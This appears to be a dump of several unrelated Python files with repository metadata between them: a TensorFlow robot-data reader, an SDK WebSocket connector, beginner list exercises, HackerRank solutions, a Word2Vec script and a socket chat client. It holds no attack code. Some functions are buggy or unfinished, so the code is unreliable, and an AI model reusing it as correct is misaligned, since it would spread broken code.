touch_seq.append(touchdata)
if 'use_object_pos' in conf:
object_pos = tf.reshape(features[object_pos_name], shape=[1, OBJECT_POS_DIM*num_obj])
object_pos_seq.append(object_pos)
max_move_pos = tf.reshape(features[max_move_pos_name], shape=[1, OBJECT_POS_DIM])
max_move_pos_seq.append(max_move_pos)
if gtruth_pred:
gtruthimage_seq = tf.concat(axis=0, values=gtruthimage_seq)
predimage_seq = tf.concat(axis=0, values=predimage_seq)
if conf['visualize']:
num_threads = 1
else:
num_threads = np.min((conf['batch_size'], 32))
[pred_image_batch, gtruth_image_batch] = tf.train.batch(
[predimage_seq, gtruthimage_seq],
conf['batch_size'],
num_threads=num_threads,
capacity=100 * conf['batch_size'])
return gtruth_image_batch, pred_image_batch
else:
image_seq = tf.concat(axis=0, values=image_seq)
if 'retina' in conf:
retina_seq = tf.concat(axis=0, values=retina_seq)
if conf['visualize']: num_threads = 1
else: num_threads = np.min((conf['batch_size'], 32))
state_seq = tf.concat(axis=0, values=state_seq)
action_seq = tf.concat(axis=0, values=action_seq)
if 'touch' in conf:
touch_seq = tf.concat(axis=0, values=touch_seq)
if 'use_object_pos' in conf.keys() and not 'retina' in conf:
[image_batch, action_batch, state_batch, object_pos_batch, max_move_pos_batch] = tf.train.batch(
[image_seq, action_seq, state_seq, object_pos_seq, max_move_pos_seq],
conf['batch_size'],
num_threads=num_threads,
capacity=100 * conf['batch_size'])
return image_batch, action_batch, state_batch, object_pos_batch, max_move_pos_batch
elif 'retina' in conf:
[image_batch, retina_batch, action_batch, state_batch, object_pos_batch] = tf.train.batch(
[image_seq, retina_seq, action_seq, state_seq, object_pos_seq],
conf['batch_size'],
num_threads=num_threads,
capacity=100 * conf['batch_size'])
return image_batch, retina_batch, action_batch, state_batch, object_pos_batch
elif 'touch' in conf:
[image_batch, action_batch, state_batch, touch_batch] = tf.train.batch(
[image_seq, action_seq, state_seq, touch_seq],
conf['batch_size'],
num_threads=num_threads,
capacity=100 * conf['batch_size'])
return image_batch, action_batch, state_batch, touch_batch
else:
[image_batch, action_batch, state_batch] = tf.train.batch(
[image_seq, action_seq, state_seq],
conf['batch_size'],
num_threads=num_threads,
capacity=100 * conf['batch_size'])
return image_batch, action_batch, state_batch
def resize_im(features, image_name, conf, height = None):
COLOR_CHAN = 3
if '128x128' in conf:
ORIGINAL_WIDTH = 128
ORIGINAL_HEIGHT = 128
IMG_WIDTH = 128
IMG_HEIGHT = 128
elif height != None:
ORIGINAL_WIDTH = height
ORIGINAL_HEIGHT = height
IMG_WIDTH = height
IMG_HEIGHT = height
else:
ORIGINAL_WIDTH = 64
ORIGINAL_HEIGHT = 64
IMG_WIDTH = 64
IMG_HEIGHT = 64
image = tf.decode_raw(features[image_name], tf.uint8)
image = tf.reshape(image, shape=[1, ORIGINAL_HEIGHT * ORIGINAL_WIDTH * COLOR_CHAN])
image = tf.reshape(image, shape=[ORIGINAL_HEIGHT, ORIGINAL_WIDTH, COLOR_CHAN])
if IMG_HEIGHT != IMG_WIDTH:
raise ValueError('Unequal height and width unsupported')
crop_size = min(ORIGINAL_HEIGHT, ORIGINAL_WIDTH)
image = tf.image.resize_image_with_crop_or_pad(image, crop_size, crop_size)
image = tf.reshape(image, [1, crop_size, crop_size, COLOR_CHAN])
image = tf.image.resize_bicubic(image, [IMG_HEIGHT, IMG_WIDTH])
image = tf.cast(image, tf.float32) / 255.0
return image
##### code below is used for debugging
def add_visuals_to_batch(conf, image_data, pos_data, color ='b'):
seq_len = image_data.shape[1]
bsize = image_data.shape[0]
img = np.uint8(255. * image_data)
image__with_visuals = np.zeros_like(image_data, dtype=np.uint8)
for b in range(bsize):
for t in range(seq_len):
state = pos_data[b, t]
sel_img = img[b,t]
image__with_visuals[b, t] = get_frame_with_posdata(sel_img, state, color)
# image__with_visuals[b, t] = get_frame_with_visual(sel_img, actions, state, action_pos= action_pos)
return image__with_visuals.astype(np.float32) / 255.0
def get_frame_with_posdata(img, pos, color = 'b'):
"""
visualizes the actions in the frame
:param img:
:param action:
:param state:
:param action_pos:
:return:
"""
numobjects = 1
pos = pos.reshape(numobjects,3)
fig = plt.figure(figsize=(1, 1), dpi=64)
fig.add_subplot(111)
plt.subplots_adjust(left=0, bottom=0, right=1, top=1, wspace=0, hspace=0)
axes = plt.gca()
plt.cla()
axes.axis('off')
plt.imshow(img, zorder=0)
axes.autoscale(False)
for i in range(numobjects):
arrow_end = pos[i,:2] + np.array([np.cos(pos[i,2]),np.sin(pos[i,2])])*.15
arrow_end = mujoco_to_imagespace(arrow_end)
pos_img = mujoco_to_imagespace(pos[i,:2])
plt.plot(pos_img[1], pos_img[0], zorder=1, marker='o', color=color)
yaction = np.array([pos_img[0], arrow_end[0]])
xaction = np.array([pos_img[1], arrow_end[1]])
plt.plot(xaction, yaction, zorder=1, color=color, linewidth=3)
fig.canvas.draw() # draw the canvas, cache the renderer
data = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')
data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,))
# plt.show()
# Image.fromarray(data).show()
# pdb.set_trace()
return data
def get_frame_with_visual(img, action, state, action_pos= False):
"""
visualizes the actions in the frame
:param img:
:param action:
:param state:
:param action_pos:
:return:
"""
fig = plt.figure(figsize=(1, 1), dpi=64)
fig.add_subplot(111)
plt.subplots_adjust(left=0, bottom=0, right=1, top=1, wspace=0, hspace=0)
axes = plt.gca()
plt.cla()
axes.axis('off')
plt.imshow(img, zorder=0)
axes.autoscale(False)
if action_pos:
p = mujoco_to_imagespace(action)
else:
p = mujoco_to_imagespace(state + .05 * action)
state = mujoco_to_imagespace(state)
plt.plot(state[1], state[0], zorder=1, marker='o', color='r')
yaction = np.array([state[0], p[0]])
xaction = np.array([state[1], p[1]])
plt.plot(xaction, yaction, zorder=1, color='y', linewidth=3)
fig.canvas.draw() # draw the canvas, cache the renderer
data = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')
data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,))
# plt.show()
# Image.fromarray(data).show()
# pdb.set_trace()
return data
def mujoco_to_imagespace(mujoco_coord, numpix=64):
viewer_distance = .75 # distance from camera to the viewing plane
window_height = 2 * np.tan(75 / 2 / 180. * np.pi) * viewer_distance # window height in Mujoco coords
pixelheight = window_height / numpix # height of one pixel
pixelwidth = pixelheight
window_width = pixelwidth * numpix
middle_pixel = numpix / 2
pixel_coord = np.array([-mujoco_coord[1], mujoco_coord[0]])/pixelwidth + \
np.array([middle_pixel, middle_pixel])
return pixel_coord
if __name__ == '__main__':
# for debugging only:
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
print 'using CUDA_VISIBLE_DEVICES=', os.environ["CUDA_VISIBLE_DEVICES"]
conf = {}
# DATA_DIR = '/home/frederik/Documents/lsdc/experiments/cem_exp/benchmarks_goalimage/pixelerror_store_wholepred/tfrecords/train'
DATA_DIR = '/home/frederik/Documents/lsdc/pushing_data/random_action_var10_pose/test'
# DATA_DIR = '/media/frederik/harddrive/pushingdata/large_displacement_pose180k/train/'
# DATA_DIR = '/home/frederik/Documents/lsdc/pushing_data/retina/train'
conf['schedsamp_k'] = -1 # don't feed ground truth
conf['data_dir'] = DATA_DIR # 'directory containing data_files.' ,
conf['skip_frame'] = 1
conf['train_val_split']= 0.95
conf['sequence_length']= 15 # 'sequence length, including context frames.'
conf['use_state'] = True
conf['batch_size']= 20
conf['visualize']=False
# conf['retina'] = 80
conf['use_object_pos'] =''
conf['num_obj'] = 4
print '-------------------------------------------------------------------'
print 'verify current settings!! '
for key in conf.keys():
print key, ': ', conf[key]
print '-------------------------------------------------------------------'
# both ground truth and predicted images in data:
gtruth_pred = False
touch = False
print 'testing the reader'
if touch:
conf['touch'] = ''
image_batch, action_batch, state_batch, touch_batch = build_tfrecord_input(conf, training=True)
elif 'use_object_pos' in conf:
image_batch, action_batch, state_batch, pos_batch, max_move_pos_batch = build_tfrecord_input(conf, training=True)
elif 'retina' in conf:
image_batch, retina_batch, retpos_batch, action_batch, state_batch, pos_batch = build_tfrecord_input(conf, training=True)
else:
image_batch, action_batch, state_batch = build_tfrecord_input(conf, training=True,gtruth_pred= gtruth_pred)
sess = tf.InteractiveSession()
tf.train.start_queue_runners(sess)
sess.run(tf.global_variables_initializer())
for i in range(1):
print 'run number ', i
if gtruth_pred:
gtruth_data, pred_data = sess.run([gtruth_image_batch, pred_image_batch])
elif touch:
image_data, action_data, state_data, touch_data = sess.run([image_batch,
action_batch,
state_batch,
touch_batch])
elif 'use_object_pos' in conf:
image_data, action_data, state_data, pos_data, max_move_data = sess.run([image_batch, action_batch, state_batch, pos_batch, max_move_pos_batch])
elif 'retina' in conf:
image_data, retina_data, retpos_data, action_data, state_data = sess.run([image_batch, retina_batch, retpos_batch, action_batch, state_batch])
else:
image_data, action_data, state_data = sess.run([image_batch, action_batch, state_batch])
print 'action:', action_data.shape
print 'action: batch ind 0', action_data[0]
print 'action: batch ind 1', action_data[1]
# pos_data = np.squeeze(pos_data)
# print 'pos:', pos_data.shape
# print 'pos: batch ind 0', pos_data[0]
# print 'pos: batch ind 1', pos_data[1]
# pos_data = np.squeeze(pos_data)
giffile = '/'.join(str.split(conf['data_dir'], '/')[:-1] + ['preview'])
comp_single_video(giffile, image_data, num_exp=8)
if 'use_object_pos' in conf:
visual_batch = add_visuals_to_batch(conf, image_data, max_move_data)
giffile = '/'.join(str.split(conf['data_dir'], '/')[:-1] + ['video_with_pos'])
comp_single_video(giffile, visual_batch, num_exp=10)
pdb.set_trace()
# make video preview video
gif_preview = '/'.join(str.split(__file__, '/')[:-2] + ['preview'])
if 'retina' in conf:
print retpos_data
retina_data = np.split(retina_data, retina_data.shape[1], axis=1)
retina_data = np.squeeze(retina_data)
giffile = '/'.join(str.split(conf['data_dir'], '/')[:-1] + ['preview'])
assembled = assemble_gif([retina_data], num_exp=10)
npy_to_gif(assembled, giffile+'_retina')
else:
comp_single_video(gif_preview, image_data, num_exp=conf['batch_size'])
# make video preview video with annotated forces
# gif_preview = '/'.join(str.split(__file__, '/')[:-1] + ['preview_visuals'])
# comp_single_video(gif_preview, add_visuals_to_batch(image_data, action_data, state_data, action_pos=True))
# show some frames
# for i in range(10):
# # print 'object pos', object_pos.shape
# img = np.uint8(255. *image_data[0, i])
# img = Image.fromarray(img, 'RGB')
# img.show()
# get_frame_with_posdata(img, object_pos[0, i])
|
[
"frederik.ebert@mytum.de"
] |
frederik.ebert@mytum.de
|
af525ba2ecb614636ec05e27a2a9a2e87baddc34
|
b7341581abaf2fb50e10e14911cc579e606a23d2
|
/sirius_sdk/base.py
|
a1b521ab14b01c31c004db93b6b13035aede40d2
|
[
"Apache-2.0"
] |
permissive
|
GarlonHasham/sirius-sdk-python
|
3e627af6c2b3ef641b27514787fb08d0e0b30808
|
715b12c910574d78502f186aa512bc1ef5b63fbc
|
refs/heads/master
| 2023-05-14T03:56:29.141362
| 2021-06-03T10:42:01
| 2021-06-03T10:42:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,958
|
py
|
import asyncio
from abc import ABC, abstractmethod
from typing import Any, Union, List
from urllib.parse import urljoin
from inspect import iscoroutinefunction
import aiohttp
from sirius_sdk.messaging import Message
from sirius_sdk.errors.exceptions import *
class JsonSerializable:
@abstractmethod
def serialize(self) -> dict:
raise NotImplemented
@classmethod
@abstractmethod
def deserialize(cls, buffer: Union[dict, bytes, str]):
raise NotImplemented
class ReadOnlyChannel(ABC):
"""Communication abstraction for reading data stream
"""
@abstractmethod
async def read(self, timeout: int=None) -> bytes:
"""Read message packet
:param timeout: Operation timeout is sec
:return: chunk of data stream
"""
raise NotImplemented()
class WriteOnlyChannel(ABC):
"""Communication abstraction for writing data stream
"""
@abstractmethod
async def write(self, data: bytes) -> bool:
"""
Write message packet
:param data: message packet
:return: True if success ele False
"""
raise NotImplemented()
class BaseConnector(ReadOnlyChannel, WriteOnlyChannel):
"""Transport Layer.
Connectors operate as transport provider for high-level abstractions
"""
@abstractmethod
async def open(self):
"""Open communication
"""
raise NotImplemented()
@abstractmethod
async def close(self):
"""Close communication
"""
raise NotImplemented()
class WebSocketConnector(BaseConnector):
DEF_TIMEOUT = 30.0
ENC = 'utf-8'
def __init__(
self, server_address: str, path: str, credentials: bytes,
timeout: float=DEF_TIMEOUT, loop: asyncio.AbstractEventLoop=None
):
self.__session = aiohttp.ClientSession(
loop=loop,
timeout=aiohttp.ClientTimeout(total=timeout),
headers={
'origin': server_address,
'credentials': credentials.decode('ascii')
}
)
self._url = urljoin(server_address, path)
self._ws = None
def __del__(self):
asyncio.ensure_future(self.__session.close())
@property
def is_open(self):
return self._ws is not None and not self._ws.closed
async def open(self):
if not self.is_open:
self._ws = await self.__session.ws_connect(url=self._url)
async def close(self):
if self.is_open:
await self._ws.close()
self._ws = None
async def reopen(self):
await self.close()
await self.open()
async def read(self, timeout: int=None) -> bytes:
try:
msg = await self._ws.receive(timeout=timeout)
except asyncio.TimeoutError as e:
raise SiriusTimeoutIO() from e
if msg.type in [aiohttp.WSMsgType.CLOSE, aiohttp.WSMsgType.CLOSING, aiohttp.WSMsgType.CLOSED]:
raise SiriusConnectionClosed()
elif msg.type == aiohttp.WSMsgType.TEXT:
return msg.data.encode(self.ENC)
elif msg.type == aiohttp.WSMsgType.BINARY:
return msg.data
elif msg.type == aiohttp.WSMsgType.ERROR:
raise SiriusIOError()
async def write(self, message: Union[Message, bytes]) -> bool:
if isinstance(message, Message):
payload = message.serialize().encode(self.ENC)
else:
payload = message
await self._ws.send_bytes(payload)
return True
class AbstractStateMachine(ABC):
def __init__(self, time_to_live: int = 60, logger=None, *args, **kwargs):
"""
:param time_to_live: state machine time to live to finish progress
"""
self.__time_to_live = time_to_live
self.__is_aborted = False
if logger is not None:
if iscoroutinefunction(logger) or callable(logger):
pass
else:
raise RuntimeError('Expect logger is iscoroutine function or callable object')
self.__logger = logger
self.__coprotocols = []
@property
def time_to_live(self) -> int:
return self.__time_to_live
@property
def is_aborted(self) -> bool:
return self.__is_aborted
async def abort(self):
"""Abort state-machine"""
self.__is_aborted = True
for co in self.__coprotocols:
await co.abort()
self.__coprotocols.clear()
async def log(self, **kwargs) -> bool:
if self.__logger:
kwargs = dict(**kwargs)
kwargs['state_machine_id'] = id(self)
await self.__logger(**kwargs)
else:
return False
def _register_for_aborting(self, co):
self.__coprotocols.append(co)
def _unregister_for_aborting(self, co):
self.__coprotocols = [item for item in self.__coprotocols if id(item) != id(co)]
|
[
"minikspb@gmail.com"
] |
minikspb@gmail.com
|
c01de8536620d8a07822fb1b991326e6bcd932c0
|
a46b1249f2e639041a9f10a475e2321c450cebcc
|
/Python/5.3.py
|
082b3874831b3625b1cfe19e3df5af9f0f192ae7
|
[] |
no_license
|
sarpong4/ICPP
|
5f3598dbbbf6edb49e5dbfe969bd208e4d1453e7
|
d3d9d4a5808a96ca0c5c3beda17ffcb59691f26c
|
refs/heads/master
| 2022-01-06T06:47:36.435602
| 2018-05-18T23:33:24
| 2018-05-18T23:33:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,441
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 24 10:02:55 2018
@author: Dr. Neptune
"""
# 5.3 | Lists and Mutability
#%%
L = ['I did it all', 4, 'Love']
for i in range(len(L)):
print(L[i])
[1, 2, 3, 4][1:3][1]
#%%
Techs = ['MIT', 'Caltech']
Ivys = ['Harvard', 'Yale', 'Brown']
Univs = [Techs, Ivys]
Univs1 = [['MIT', 'Caltech'], ['Harvard', 'Yale', 'Brown']]
print('Universities =', Univs)
print('Universities 1 =', Univs1)
print(Univs == Univs1)
#%%
# test value equality
print(Univs == Univs1)
# test object equality
print(id(Univs) == id(Univs1))
print('ID of Univs =', id(Univs))
print('ID of Univs1 =', id(Univs1))
#%%
Techs.append('RPI')
print(Techs)
'''
When there are 2 distinct paths to the same list object, we can that aliasing
'''
#%%
for e in Univs:
print('Univs contains', e)
print('\twhich contains')
for u in e:
print('\t', u)
#%%
L1 = [1, 2, 3]
L2 = [4, 5, 6]
L3 = L1 + L2
print('L3 =', L3)
L1.extend(L2)
print('L1 =', L1)
L1.append(L2)
print('L1 =', L1)
'''
L.append(e) adds the object e to the end of L
L.count(e) returns the number of times that e occurs in L
L.insert(i, e) inserts the object e into L at index i
L.extend(L1) adds the items in list L1 to the end of L
L.remove(e) deletes the first occurence of e from L
L.index(e) returns the index of the first occurrence of e in L, and raises an exception if e is not in L
L.pop(i) removes and returns the item at index i in L, raises an exception is L is empty. If i is omitted, it defaults to -1, to remove and return the last element of L
L.sort() sorts the elements of L in ascending order
L.reverse() reverses the order of the elements in L
'''
# Cloning
#%%
'''
It is prudent to avoid mutating a list over which one is iterating.
This can cause side effects
'''
def removeDups(L1, L2):
'''
Assumes that L1 and L2 are lists.
Removes any element from L1 that also occurs in L2
'''
for e1 in L1:
if e1 in L2:
L1.remove(e1)
L1 = [1, 2, 3, 4]
L2 = [1, 2, 5, 6]
removeDups(L1, L2)
print('L1 =', L1)
#%%
'''
This mutation can be aovided using slicing to clone (make a copy of the list)
'''
# 5.3.2 | List Comprehension
L = [x**2 for x in range(1,7)]
print(L)
mixed = [1, 2, 'a', 3, 4.0]
print([x**2 for x in mixed if type(x) == int])
|
[
"gangalfish@live.com"
] |
gangalfish@live.com
|
00703d235bd4a267879c667ef3115ad8876c9d0c
|
8d7b51daf45cb883d600628db12ba73e01b48155
|
/mooc/ex2/plotData.py
|
c63c370d7373ecf1b09d064447d8b77265e5ba16
|
[] |
no_license
|
hendrikfrentrup/ML_tools
|
0c94bd41f4fedf55dc7aab9c341709aa58e01c6f
|
30f894e10e53cb7776979af11dbb3087a93c2339
|
refs/heads/master
| 2022-11-19T19:22:50.252753
| 2022-11-15T10:37:14
| 2022-11-15T10:37:14
| 56,457,876
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 536
|
py
|
def plotData(X,y):
#plotData Plots the data points X and y (into a new figure)
# plotData(X,y) plots the data points with + for the positive examples
# and o for the negative examples. X is assumed to be a Mx2 matrix.
import matplotlib.pyplot as pl
# Find indeces where y is True/1 or False/0
pos = y==1
neg = y==0
# Plot (into new figure?)
pl.plot( X[pos,0],X[pos,1],'g+',
X[neg,0],X[neg,1],'ro')
# block=False to prevent blocking while plot persists
pl.show(block=False)
|
[
"hendrik.frentrup@gmail.com"
] |
hendrik.frentrup@gmail.com
|
6e36e18ce750b34dc68b27706397187772e6fd8b
|
6c0329fedf2282344c8f8ec0dd3b135fb4c5e77c
|
/DynamicProgramming.py
|
06d6468dffff017b867953ab0284eef6db396e19
|
[] |
no_license
|
feiteng/hackerRank
|
451656e4326c6d7c6918f040e6c4bbb8a7a20d05
|
b1d2d2d5f9c1873dc1fb7bcfae043e7484146a82
|
refs/heads/master
| 2021-01-20T09:55:17.488942
| 2017-05-23T14:19:54
| 2017-05-23T14:19:54
| 90,303,364
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,114
|
py
|
def The_Coin_Change_Problem():
n, m = map(int, input().split())
coins = list(map(int, input().split()))
ways = [0] * (n + 1)
ways[0] = 1
for i in range(len(coins)):
for j in range(coins[i], n + 1):
ways[j] += ways[j - coins[i]]
print(ways[n])
def Equal():
for _ in range(int(input())):
q = input()
n = list(map(int, input().split()))
minval = min(n)
minvals = [i - minval for i in n]
count = sum(op(m) for m in minvals)
# print(count)
for i in [1, 1, 3]:
minvals = [m + i for m in minvals]
nextcount = sum(op(m) for m in minvals)
count = min(count, nextcount)
print(count)
def op(n):
coins = [1, 2, 5]
count = 0
count += n // 5
n %= 5
count += n // 2
n %= 2
count += n
return count
def Fibonacci_Modified():
a0, a1, n = map(int, input().split())
for i in range(n - 2):
a2 = a0 + a1 ** 2
a0 = a1
a1 = a2
print(a2)
def Sherlock_and_Cost():
for _ in range(int(input())):
n = int(input())
b = list(map(int, input().split()))
if (n < 2):
print(0)
continue
p = [0]
np = [0]
for i in range(1, n):
p.append(max(b[i] - 1 + np[i - 1], p[i - 1]))
np.append(max(p[i - 1] + b[i - 1] - 1, np[i - 1]))
print(max(p[-1], np[-1]))
def Vertical_Sticks():
for _ in range(int(input())):
n = int(input())
c = list(map(int, input().split()))
v = []
for i in c:
v.append(sum([1 if i <= j else 0 for j in c]))
count = 0
for i in v:
count += (n + 1) / (i + 1)
print('{0:.2f}'.format(count))
def Candies():
candyCount = []
for _ in range(int(input())):
candyCount.append((int(input())))
ratings = [1 for _ in range(len(candyCount))]
print(candy(candyCount))
def candy(ratings):
"""
:type ratings: List[int]
:rtype: int
"""
candies = [1 for _ in range(len(ratings))]
for i in range(len(candies) - 1):
if ratings[i] < ratings[i + 1]:
candies[i + 1] = candies[i] + 1
for i in range(len(candies) - 1, 0, -1):
if ratings[i] < ratings[i - 1]:
candies[i - 1] = max(candies[i - 1], candies[i] + 1)
# print(candies)
return sum(candies)
def Sam_and_substrings():
s = input()
count = 0
factor = 1
k = 1
for i in range(len(s) - 1, -1, -1):
n = int(s[i])
count += n * (i + 1) * factor % 1000000007
factor = (factor * 10 + 1) % 1000000007
print(count % 1000000007)
def Abbreviation():
import collections
for _ in range(int(input())):
a = input()
b = input()
aCap = [ai for ai in a if ai < 'a']
fal = False
c1 = collections.Counter(aCap)
c2 = collections.Counter(b)
for c in c1.keys():
if c not in c2 or c1[c] > c2[c]:
fal = True
# for c in c2.keys():
# if c not in c1 or c2[c] > c1[c]:
# fal = True
a = a.upper()
if fal:
print("NO")
else:
lcslen = AbbreviationLCS(b, a, len(b) - 1, len(a) - 1)
if lcslen == len(b):
print("YES")
else:
print("NO")
def AbbreviationLCS(a, b, i, j):
lcs = [[0 for x in range(j + 1)] for y in range(i + 1)]
run = 0
while i >= 0 and j >= 0:
if a[i] == b[j]:
run += 1
lcs[i][j] += run
i -= 1
j -= 1
else:
j -= 1
return run
# if i < 0 or j < 0: return 0
# if a[i] == b[j]: return 1 + AbbreviationLCS(a, b, i - 1, j - 1)
# return AbbreviationLCS(a, b, i - 1, j)
def The_Longest_Common_Subsequence():
n, m = map(int, input().split())
A = list(map(int, input().split()))
B = list(map(int, input().split()))
import time
t = time.time()
Abbreviation()
# AbbreviationLCS([],[],5,3)
print(time.time() - t)
|
[
"fl750@nyu.edu"
] |
fl750@nyu.edu
|
13c876bb6562c6106b1ba1a869f2d9b0c82c55ff
|
5963bdd035ced26df0fac99bf03368c6f6ac8da7
|
/AntitrustLNAnalysis/Word2Vec.py
|
94986de25f8d0c4cb4b275cf6e8dca91b2af48e5
|
[] |
no_license
|
javant4/Special-Projects
|
bd38f6b2d27f168e24c19e89ec35f005dd6d0d54
|
04a6db29aca6c9c9f13d8d5cd65c9ea83047fabf
|
refs/heads/master
| 2022-12-06T19:56:03.076516
| 2018-09-23T19:04:04
| 2018-09-23T19:04:04
| 150,013,152
| 0
| 1
| null | 2022-11-28T00:54:31
| 2018-09-23T18:28:08
|
Python
|
UTF-8
|
Python
| false
| false
| 3,836
|
py
|
import gensim
from docx import Document
import os
from gensim.models import Word2Vec
import logging
import re
from nltk.corpus import stopwords
from nltk import word_tokenize
import nltk.data
# nltk.download('punkt')
tokenizer = nltk.data.load('nltk:tokenizers/punkt/english.pickle')
def read_docs(file):
data = Document(file)
raw_text = ''
for p in data.paragraphs:
raw_text += p.text + ' '
return raw_text
# f = open("path/to/text/file", "r+", encoding = 'utf8')
# q = f.read()
def pre_processing(case):
text = []
path = os.path.join(os.getcwd(), 'data', case)
stop_words = set(stopwords.words('english')) # language can change
for idx, file in enumerate(os.listdir(path)):
if file.endswith('docx'):
word_tok = word_tokenize(read_docs(os.path.join(path,file))) # splits the text into a list of words
remove_stopwords = [w for w in word_tok if not w in stop_words]
sent = ' '.join(remove_stopwords) # joins the lists of words back into a string
text.append(sent)
return text
# res = pre_processing('afc')
# for doc in res:
# print(doc)
# break
# print(len(sent)) #Confirms that you have filtered words
# print(len(q))
def sentence_to_wordlist(sentences, remove_stopwords=False):
# 1. Remove non-letters
sentence_text = re.sub(r'[^\w\s]', '', sentences) # removes all non-alphanumerics characters
# 2. Convert words to lower case and split them
words = sentence_text.lower().split()
# 3. Return a list of words
return words
def split_by_sentences(tokenizer, remove_stopwords=False):
for doc in pre_processing('fr'):
try:
# 1. Use the NLTK tokenizer to split the text into sentences
raw_sentences = tokenizer.tokenize(doc.strip())
# 2. Loop over each sentence
sentences = []
for raw_sentence in raw_sentences:
# If a sentence is empty, skip it
if len(raw_sentence) > 0:
# Otherwise, call sentence_to_wordlist to get a list of words
sentences.append(sentence_to_wordlist(raw_sentence))
# 3. Return the list of sentences (each sentence is a list of words, so this returns a list of lists)
len(sentences)
return sentences
except:
print('nope')
sent_list = split_by_sentences(tokenizer)
# # These are parameters that can be tweaked to accomodate the corpus
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
num_features = 100 # Word vector dimensionalty
min_word_count = 1 # Minimum word count (ie. Only count words that show at least the min times)
num_workers = 4 # Number of threads to run in parallel
context = 20 # Context window size (ie. how many words surrounding the target word will count towards)
downsampling = 1e-3
model = gensim.models.Word2Vec(sent_list, workers=num_workers, size=num_features, min_count = min_word_count, window = context, sample = downsampling)
model.save('fr_model_w20') #save the model for future use or analysis
# #load model
# # model = Word2Vec.load('model name')
# print(model) #to see model vocab size
# print(model.wv.vocab) #display model vocab
# model.most_similar(positive='', topn=30) #view the words that have the highest correlation to the target word
# model.most_similar(positive='', negative='') #view words that are related to the (positive) but not related to the (negative)
#For (positive) and (negative) string args can be lists as well
# Ex: model.most_similar(positive=['',''], topn=30)
# Ex: model.most_similar(positive=['',''], negative=['','',''])
### Other examples of post model analysis functions
### https://radimrehurek.com/gensim/models/word2vec.html
|
[
"31806937+javant4@users.noreply.github.com"
] |
31806937+javant4@users.noreply.github.com
|
03c4bf7b090b48115675d7782ebce880b5b8cb68
|
e8858907c61aea7ec6b80390745e7c8864c13b75
|
/src/game/tests/deck-tester.py
|
b77725c09c8d5cdc205961986568c9f134c65ea6
|
[] |
no_license
|
The2b/AI-Poker-Project
|
431294f66f2cbb7f6974c3e6888aaf84ff0834ca
|
b23798c6a34661434ca56a01baa94fdb07d82422
|
refs/heads/master
| 2021-04-29T23:09:06.716014
| 2018-04-20T00:53:35
| 2018-04-20T01:33:31
| 121,548,968
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 163
|
py
|
from Deck import Deck
import copy
ourDeck = Deck(None,None);
CardsDelt = copy.deepcopy(ourDeck.dealCards(10));
for Card in CardsDelt:
print(type(ourDeck));
|
[
"thomas.lenz96@gmail.com"
] |
thomas.lenz96@gmail.com
|
d27b3f107bc594ca0d864e1df5839555b1d76a77
|
5081a7f9d2bb521fa7ab6738d2c766b40daa2957
|
/cl.py
|
f68db42f854dcf6aebefeacd7bf412fbfee14272
|
[] |
no_license
|
robinthomas-hmh/chatserv
|
5dab41359a479443205cd71734f8929aea61ecb5
|
11f6bf0e57399327031d7e632c9230b4bce75386
|
refs/heads/master
| 2022-05-22T20:45:23.896403
| 2022-05-09T10:50:39
| 2022-05-09T10:50:39
| 140,443,902
| 0
| 0
| null | 2022-05-09T10:50:40
| 2018-07-10T14:24:20
|
Python
|
UTF-8
|
Python
| false
| false
| 3,092
|
py
|
import socket
import sys
import threading
from threading import Thread
from socketserver import ThreadingMixIn
class server_thread(Thread):
def run(self):
self.c_socket.send(self.hello_msg.encode())
srv_helo_rep = self.c_socket.recv(2048).decode()
print("\n",srv_helo_rep)
#msg_test = input("Please enter join msg")
msg_to_join = "JOIN_CHATROOM: "+self.cl_chatroom+"\nCLIENT_IP: "+str(self.cl_client_ip)+"\nPORT: "+str(self.cl_client_port)+"\nCLIENT_NAME: "+self.cl_client_name+"\n"
self.cl_socket.send(msg_to_join.encode())
while True:
message_server = self.cl_socket.recv(2048).decode()
if "DISCONNECT" in message_server:
print(message_server)
flag=1
self.cl_socket.close()
sys.exit()
else:
if len(message_server)>0:
print(message_server)
sys.stdout.write("Type a Message: ")
sys.stdout.flush()
message_client = sys.stdin.readline()
self.cl_socket.send(message_client.encode())
def __init__(self,cl_socket,cl_client_ip,cl_client_port,cl_chatroom,cl_client_name,hello_msg):
Thread.__init__(self)
self.cl_socket = cl_socket
self.cl_client_ip = cl_client_ip
self.cl_client_port = cl_client_port
self.cl_chatroom = cl_chatroom
self.cl_client_name = cl_client_name
self.hello_msg = hello_msg
class server_reply(Thread):
def __init__(self,c_socket):
Thread.__init__(self)
self.c_socket = c_socket
def run(self):
client_socket2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket2.connect((IP_address, Port2))
#print("test: inside thread reply")
while True:
if flag==0:
msg_from_server=client_socket2.recv(1024).decode()
print(msg_from_server)
if flag == 1:
client_socket2.close()
sys.exit()
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if len(sys.argv) != 3:
print("Enter IP address and port number")
exit()
chatroom = input("Enter the name of the chatroom: ")
client_ip = 0
client_port = 0
client_name = input("Please enter the name of the client : ")
IP_address = str(sys.argv[1])
Port = int(sys.argv[2])
client_socket.connect((IP_address, Port))
Port2 = 5050
flag=0
threads = []
helo_msg = input("Enter helo:")
try:
clientThread = server_thread(client_socket,client_ip,client_port,chatroom,client_name,helo_msg)
clientThread.daemon = True
clientThread.start()
clientThread2 = server_reply(client_socket)
clientThread2.daemon = True
#clientThread2.start()
threads.append(clientThread)
#threads.append(clientThread2)
while True:
for t in threads:
t.join(600)
if not t.isAlive():
break
break
except KeyboardInterrupt:
client_socket.send("Bye".encode())
sys.exit()
|
[
"robin70001@gmail.com"
] |
robin70001@gmail.com
|
4ba047ffbc19e84d25aa4a3cdda4854bf5776538
|
